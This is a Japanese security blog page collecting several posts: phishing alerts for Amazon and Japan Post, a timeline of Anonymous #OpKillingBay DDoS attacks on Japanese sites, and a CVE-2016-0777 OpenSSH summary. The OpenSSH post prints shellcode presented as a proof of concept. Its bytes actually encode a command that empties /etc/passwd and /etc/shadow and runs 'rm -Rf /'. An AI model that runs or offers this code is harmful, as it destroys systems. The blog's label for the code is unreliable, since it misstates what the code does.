2016年2月1日、フィッシング詐欺に関する情報収集、提供、注意喚起を行っているフィッシング対策協議会が、Amazon をかたるフィッシングサイトが見つかったとして注意喚起を行いました。今回見つかったAmazonのフィッシングサイトは、co.jp や com と誤認しやすいコロンビアのドメイン .co が使わており注意が必要です。

https://www.antiphishing.jp/news/alert/amazon_20160201.html

フィッシングサイトのURL

確認されているAmazon をかたるフィッシングサイトのURL

  • hxxp://www.amazomjp.co/

  • hxxp://www.amazomjp.co/5627b9e0831c786cac9a2af3840af71a/sign_in.php

フィッシングサイトの識別方法

Amazonがフィッシングサイトを見分けるための情報を公開しています。注文履歴を確認する方法やAmazon.co.jp が発信するEメールのEアドレスドメインなどの情報があります。

Amazon.co.jp からのEメールかどうかの識別について https://www.amazon.co.jp/gp/help/customer/display.html?nodeId=201304810

Amazon.co.jp が利用している正しいドメイン一覧です。これ以外のドメインから来たメールやWebページはフィッシングサイトと判断して注意する必要があります。

  • amazon.co.jp
  • amazon.jp
  • amazon.com
  • marketplace.amazon.co.jp
  • m.marketplace.amazon.co.jp
  • gc.email.amazon.co.jp
  • gc.amazon.co.jp
  • payments.amazon.co.jp

 


関連リンク

フィッシングサイトのコンテンツは正規サイトのコピーを使っているので見分けがつきません。ちゃんとSSL証明書で確認しましょう。

アノニマスによるサイバー攻撃の被害まとめ #OpKillingBay

更新情報:    
2016-10-28: 和歌山県伊都郡高野町へのDDoS攻撃を追加 

アノニマスによるサイバー攻撃の被害まとめ #OpKillingBay 

キーワード: アノニマス, anonymous, イルカ漁, OpKillingBay, DDoS攻撃, OpWhales

このエントリーをはてなブックマークに追加          

はじめに 

この記事は、アノニマス(Anonymous)によるDDoS攻撃などのサイバー攻撃を肯定するものではありません。アノニマスの #OpKillingBay オペレーションの動向を把握するためのまとめ記事です。今後も追加更新していく予定です。    
また、Twitterの情報を元に掲載しています。実際にDDoS攻撃によってダウンしたのかをすべて確認出来ているわけではありません。

概要 

アノニマス(Anonymous)のイルカ漁に抗議する #OpKillingBay オペレーションを行っています。この #OpKillingBay 自体は数年前から活動しており、以前からイルカ漁を行っている和歌山県太地町の公式ホームページなどのDDoS攻撃などを繰り返していました。2015年後半からさらに攻撃が頻繁になってきており、ASCII や成田空港、安倍総理公式ホームページなどの直接的な関係がないサイトも DDoS攻撃の被害にあっています。実際に攻撃しているアノニマスメンバーは、日本語が理解出来ていないようで攻撃対象がイルカ漁に関係しているかはあまり確認せずに攻撃を行っているようです。2016年に入ってからも、警察庁、金融庁、財務省などの官公庁も 攻撃対象とされ、実際に DDoS攻撃を受けてWebサイトが閲覧できない状態が長く続いている状況です。    
#OpKillingBay は、日本だけではなくイルカ漁・クジラ漁を行っている EU アイスランドやデンマークに対しても行われているようです。

    

2016年1月には ghostbin.com に、アノニマス #OpKillingBay の標的リストが掲載されています。これらのターゲットとなったサイトは、実際に攻撃を受ける可能性があるため警戒が必要です。以前のアノニマスのサイバー攻撃ではDDoS攻撃ツールであるLOIC(Low-Orbit Ion Canon)やWebサイトにアクセスするだけでDDoS攻撃に参加できるJavascript ベースの Webhive、SQL インジェクションツールの Havij などが多く使われていました。

    

#OpKillingBayでの DDoS攻撃のターゲット 

スポンサーリンク

  • 2016年9月14日 農林水産省 植物防疫所 PLANT PROTECTION STATION(https://www.jacar.go.jp/)に対してDDoS攻撃したとツイート。Connection timed out ではなく 403 Forbidden。元々ページが存在しなかったのかも  

  • 2016年9月4日 アジア歴史資料センター(https://www.jacar.go.jp/)に対してDDoS攻撃したとツイート    

  • 2016年4月1日 NTT(http://www.ntt.co.jp) に対してDDoS攻撃したことをツイート       

  • 2016年3月15日 三重大学に対してDDoS攻撃  

三重大にサイバー攻撃か HPに障害、「アノニマス」が声明

http://www.chunichi.co.jp/s/article/2016031590085351.html   

「イルカ研究」に反対して三重大学HPに対してDDoS攻撃を実施した模様

三重大学は、2016年度に鯨類の繁殖促進するための研究センターを設置する予定  

  • 10:03 - 2016年2月1日 動物を殺害する資金を出しているとして財務省をDDoS攻撃?  

  • 0:09 - 2016年2月1日 動物を殺害する資金を出しているとして金融庁金融庁をDDoS攻撃?(23:26 - 2016年1月31日分について)

  • 23:26 - 2016年1月31日 殺すための資金を止めろと主張して金融庁をDDoS攻撃    

  • 20:35 - 2016年1月29日 映画「ビハインド・ザ・コーヴ〜捕鯨問題の謎に迫る〜」 Behind "THE COVE" Official Site に DDoS攻撃    

  • 2016年1月27日 成田空港 #Anonymousは、@Techworm_in#OpKillingBay で「ザ ・ コーブ」のリック ・ オバリー拘束に抗議のため空港ウェブサイトをシャットダウン #Tangodown#Japan   

  • 2016年1月27日 警察庁       

  • 6:08 - 2016年1月27日 羽田空港ターミナル、中部国際空港 セントレア   

  • 0:24 - 2016年1月27日 厚生労働省、成田空港、南海エクスプレス    

  • 23:20 - 2016年1月26日 くじらを殺すのを止めろと主張し、株式会社まるげい をDDoS攻撃   

  • 21:46 - 2016年1月26日 株式会社まるげい クジラ販売に抗議にして「まるげい」をDDoS攻撃?
  • 21:56 - 2016年1月25日 厚生労働省  「殺害を今すぐ停止しろ」と主張    

  • 23:50 - 2016年1月26日 南海エクスプレス イルカ輸送に抗議    

  • 19:42 - 2016年1月24日 成田空港 (22:18 - 2016年1月22日分について)    

スポンサーリンク

  • 19:52 - 2016年1月24日 株式会社 ひのー|製菓製パン原材料メーカー|東京都目黒区 (7:01 - 2016年1月24日分について)       
  • 7:01 - 2016年1月24日  株式会社 ひのー|製菓製パン原材料メーカー|東京都目黒クジラ肉を販売に抗議 #OpWhales

  • 22:18 - 2016年1月22日 成田空港 ric の開放を要求 #OpKillingBay       
  • 11:11 - 2016年1月19日 ghostbin.com に攻撃ターゲットを公開        
    日本の政府サイト、イルカ輸送関連サイト、日本の水族館、和歌山・太地町関係、2020 東京オリンピック         
    三菱、三井、住友、楽天、銀行、JRなどが多数のWebサイトがターゲットとしてリストされている (https://ghostbin.com/paste/fdzhu)

  • 0:32 - 2016年1月13日  日産自動車ホームページ        
    殺すのを今すぐやめろと抗議    

  • 12:18 - 2015年12月11日 衆議院議員 安倍晋三 公式サイト 

  • 2015-12-08 06:16:20 IMATA - International Marine Animal Trainer's Association(https://www.imata.org/)をDDoS攻撃

@AnonFingers   
Complicit w/Taiji https://t.co/etKYj9mrEm #TangoDown #OpKillingBay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/iBCob6JPAe    
https://twitter.com/AnonFingers/status/673974345383841797/ 
  • 2015-12-07 20:38:41 鳥羽水族館公式ホームページ(http://aquarium.co.jp)をDDoS攻撃     

@AnonFingers      
https://t.co/iGi7RNBbtJ looks to be #TangoDown #OpKillingBay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/z1Qf4jZ98Y      
https://twitter.com/AnonFingers/status/673828974397546497/     

  • 2015-12-03 07:07:35 のとじま水族館 | 来て!見て!触れる!石川県の体験型水族館(http://www.notoaqua.jp)をDDoS攻撃 

@AnonFingers      
https://t.co/ArsTtWNYfE aquarium #TangoDown #OpKillingBay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/kz3QH9Yepo      
https://twitter.com/AnonFingers/status/672175303465144320/   

  • 2015-12-02 21:31:23 おたる水族館 | イルカの水しぶき、トドの豪快ダイブ、爆笑ペンギンショー、国定公園の大自然に囲まれた水族館(http://otaru-aq.jp/)をDDoS攻撃   

@AnonFingers      
Japan aquarium https://t.co/C1DxweiYDh #TangoDown #OpKillingBay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/adbU47zj9k      
https://twitter.com/AnonFingers/status/672030299509821443/   

@AnonFingers      
https://t.co/AIC5JcCF52 / chw.jp #TangoDown #opkillingbay #tweet4taiji #Tweet4Dolphins #EmptyTheTanks https://t.co/iX9PPJM3oY      
https://twitter.com/AnonFingers/status/670314638706274304/  

  • 0:35 - 2015年11月28日 日本捕鯨協会ホームページ(http://whaling.jp/)をDDoS攻撃

スポンサーリンク

  • 2:02 - 2015年11月21日 日本の政府Webサイトとして厚生労働省ホームページ(http://mhlw.go.jp/)を攻撃 

   

2015-11-19 21:40:41 @OpKillingBay10      
#OpKillingBay #Japan https://t.co/S1iFBuUREt #TangoDown for the censoring the truth about #Taiji #TeamRektIt https://t.co/rWZbVGMC6e      
https://twitter.com/OpKillingBay10/status/667321594423869441/

  • 21:50 - 2015年11月9日 こだわりの名刺作成・印刷なら エコ名刺のecobe!(エコビー) (http://www.nissindou.co.jp/) の情報を ghostbin にリークしたとツイート(ghostbin の内容が消えていたのでリーク内容を確認できていません)

  • 10:59 - 2015年11月4日 毎日新聞のニュース・情報サイト(http://mainichi.jp/)を攻撃    

  • 3:26 - 2015年10月28日 殺害をやめ、動物を自由にしろと主張して 4つの水族館?を攻撃       
    体験型水族館とおもちゃ遊園地 南知多ビーチランド&南知多おもちゃ王国(愛知県知多半島)(http://www.beachland.jp/)        
    日本一のカエル館 富士山の見える水族館|あわしまマリンパーク(http://marinepark.jp/)        
    「環境水族館」アクアマリンふくしま(http://www.marine.fks.ed.jp/index.htm)        
    南海電鉄(http://www.nankai.co.jp/)   

  • 18:02 - 2015年10月23日 すべての日本のWebサイトにDDoS攻撃するとツイート

  • 4:17 - 2015年10月23日 日本の大手ニュース局として「東洋経済オンライン | 経済ニュースの新基準」(http://www.toyokeisai.net/)を攻撃  

  • 2:13 - 2015年10月22日 大手ITストア・IT企業として週刊アスキーなどを発行している ASCII.jp(https://ascii.jp/)を攻撃

  • 3:48 - 2015年10月15日 日本最大のオンラインストアとして ISP のぷららをDDoS攻撃 (http://www.plala.or.jp)        
    @ntsuji が Anonymous @_RektFaggot_ に対して「ぷらら」はISPだと指摘。@_RektFaggot_は日本語が読めない、ISPであればより良い?などのやり取りがあった。

  • 23:37 - 2015年10月10日 日本政府観光局にDDoS攻撃       
    Japan National Tourism Organization Web Site(http://www.jnto.go.jp/)

  • 12:46 - 2015年10月9日 The Japan News - Breaking News from Japan by The Yomiuri Shimbun 読売の英字新聞(http://the-japan-news.com/) 

  • 4:07 - 2015年10月9日 再び和歌山をシャットダウンすると宣言?

スポンサーリンク                     

関連リンク  

成田空港HPにサイバー攻撃 アノニマス犯行声明

更新日: 2016-01-25

成田空港HPにサイバー攻撃 アノニマス犯行声明


キーワード:アノニマス、anonymous、OpkillingBay、反イルカ漁

このエントリーをはてなブックマークに追加

スポンサーリンク

概要

成田空港の公式ホームページ(http://www.narita-airport.jp/)が、2017年1月22日夜から23日にかけて閲覧しずらい状態になった。アノニマスからサーバに対して大量のデータを送り続けて閲覧不能にするDDoS攻撃を受けたとみられる。成田空港の飛行機の運航などに影響は出ていない。

成田国際空港会社(NAA)によると、警察からアノニマス(Anonymous)がツイッター上に犯行声明を出しているとの連絡を受けたそうです。アノニマスは以前より和歌山県太地町で行われているイルカ漁に対する抗議として#OpKillingBayというオペレーションを行っており、日本のイルカ漁関連Webサイトなどにたびたびサイバー攻撃を仕掛けている。サイバー攻撃のターゲットとして、イルカ漁に全く関連しないKADOKAWAが運営する「ASCII.jp」(http://ascii.jp/)などのWebサイトも多数狙われており、攻撃対象が不明確となっている。今回はシーシェパード活動家アーロン チャールズ(Aaron Charles)が成田空港で入国を拒否されたことに対する抗議の可能性が考えられる。

アノニマス(Anonymous)による成田空港公式ホームページに対するDDoS攻撃に関連するツイート

成田空港の公式ホームページは、昨年 2015年10月にも今回と同様アノニマスよりDDoSサイバー攻撃を受けてHPが閲覧しずらい状態になっていました。


関連リンク


SSHクライアントに秘密鍵が漏洩する可能性のある脆弱性(CVE-2016-0777)のまとめ

更新日:2016-01-19

 

SSHクライアントに秘密鍵が漏洩する可能性のある脆弱性(CVE-2016-0777)のまとめ

 
 

 

1. 概要

 

OpenSSH でドキュメント化されていない実験的なローミング(roaming)機能(切断時に自動で再接続する機能)に脆弱性が見つかりました。この機能は OpenSSH 5.4 から追加されているため、OpenSSH 5.3 以前のバージョンは影響しません。また、コンパイル時もしくは設定により、明示的に無効にしない限り、有効になっています。この脆弱性を攻撃する悪意あるサーバと通信をすると、メモリ内容が送信されてしまい秘密鍵などの重要な情報が漏えいしてしまう可能性があります。

 

既に怪しいサーバ、信頼できないサーバに SSH で接続したことがある場合、秘密鍵などの情報が洩れている可能性があります。SSH の秘密鍵・公開鍵を再作成して入れ替えるなどの対応を行った方が良いでしょう。

 

‘Important SSH patch coming soon’ – MARC   
http://marc.info/?l=openbsd-misc&m=145278077920530&w=2

 

OpenSSH: client bug CVE-2016-0777   
http://undeadly.org/cgi?action=article&sid=20160114142733

 

2. 影響を受けるバージョン

 

OpenSSH Client 5.4 以降のバージョン(OpenSSH Client 5.4 ~ 7.1)

 

ただし、OpenSSH 6.6 は影響を受けないそうです。

 

3. 影響を受けるバージョンか確認する方法

 

> ssh –V

 

4. 対策

 

CVE-2016-0777 の脆弱性が修正(roaming機能がオフ)されたバージョンが公開されています。

 

Announce: Portable OpenSSH 7.1p2 released   
https://lists.mindrot.org/pipermail/openssh-unix-dev/2016-January/034680.html

 

5. 暫定対策

 

5.1 OpenSSH クライアントの設定(ssh_config)ファイルに、ローミング機能を無効にする設定を追加する。

 
   

echo “UseRoaming no” >> /etc/ssh/ssh_config

 

5.2 各ユーザの OpenSSH クライアントの設定ファイルに、ローミング機能を無効にする設定を追加する。

 
   

echo “UseRoaming no” >> ~/.ssh/config

 

5.3 OpenSSH で接続する際にローミング機能をオフにするオプションをつけて実行する。

 
   

-oUseRoaming=no

 

6. 検証コード

 

脆弱性を検証するためのコンセプトコード(PoC)が公開されています。

 

CVE-2016-0777 roaming openssh exploit http://pastebin.com/T2zjAdZ5

 
   

/*

   

Exploit : openssh roaming Exploit -- CVE-2016-0777

   

Author: : KingCope

   

Compile : gcc -W sploit.c -o sploit

   

Usage: : ./sploit HOST IP

   

Thanks : openBSD, congratz, guys

   

*/

   

   

unsigned char shellcode[] =

   

"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"

   

"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"

   

"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"

   

"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"

   

"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"

   

"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"

   

"\xcd\x80";

   

 

 

7. 関連情報

 
  •    

    ubuntu

       
  •  
  •    

    debian

       
  •  
  •    

    Red Hat Enterprise Linux/CentOS

       
  •  
  •    

    OpenSUSE

           

    Qualys Security Advisory Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778

           

    スポンサーリンク

        
  • ランサムウェア TeslaCrypt 2.2.0 (vvvウイルス) で暗号化されたファイルの復元方法と対策

    更新日: 2016-01-17

      

    ランサムウェア TeslaCrypt 2.2.0 (vvvウイルス) で暗号化されたファイルの復元方法と対策

      

    続きを読む "ランサムウェア TeslaCrypt 2.2.0 (vvvウイルス) で暗号化されたファイルの復元方法と対策" »

    アカウント凍結で不安を煽る「ゆうちょ銀行」をかたるフィッシングメール


    アカウント凍結で不安を煽る「ゆうちょ銀行」をかたるフィッシングメール

    2015年5月15日頃から「ゆうちょ銀行」をかたるフィッシングメールが出回っているようです。
    2015年5月16日時点でもフィッシングサイトが稼働していますが、Google フィルターによるブロックが行われています。
    フィッシングサイトにアクセスすると、偽の「ゆうちょダイレクト」のログイン画面が表示され、「お客様番号」を入力、「合言葉」の入力、「ログインパスワード」の入力の順に進み、最後に本物の「ゆうちょダイレクト」のサイトのエラー画面が表示されるようになっていました。偽の「ゆうちょダイレクト」のログイン画面で情報を入力すると、「合言葉」や「ログインパスワード」などの情報が攻撃者に送られるようになっているようです。

    「ゆうちょ銀行」をかたるフィッシングメールの内容

    差出人:direct@japanpost.jp
    件名:【ゆうちょ銀行】メールアドレスの確認 or 【ゆうちょ銀行】本人認証サービス

    こんにちは!
    最近、利用者の個人情報が一部のネットショップサーバーに不正取得され、利用者の個人情報漏洩事件が起こりました。
    お客様のアカウントの安全性を保つために、「ゆうちょ銀行システム」がアップグレードされましたが、お客さまはアカウントが凍結されないように直ちにご登録おうえご確認ください。

    以下のページより登録を続けてください。
    https://direct.jp-bank.japanpost.jp/tp1web/U010101CSK.do
    <http://***.cn/js/index.htm>

    ――Copyright(C) JAPAN POST BANK Co.,Ltd. All Rights Reserved.――

    となっていました。


    偽「ゆうちょ銀行システム」のログイン画面

    phishing JapanPost


    ログイン画面後の「合言葉」を入力させる画面

    phishing JapanPost


    偽サイト・情報の送信先(POST先)

    確認した範囲では、偽サイトで入力した情報が送られるIPアドレスは「124.11.169.187」となっていました。台湾のIPアドレスのようです。

    IP Address: 124.11.169.187
    Hostname: 124-11-169-187.static.tfn.net.tw
    Country: TW
    AS: 9924
    AS Name: TFN-TW Taiwan Fixed Network, Telco and Network Service Provider.,TW

    関連情報

     


    より以前の記事一覧

    記事一覧

    スポンサードリンク


    Twitter


    無料ブログはココログ

    ブログ検索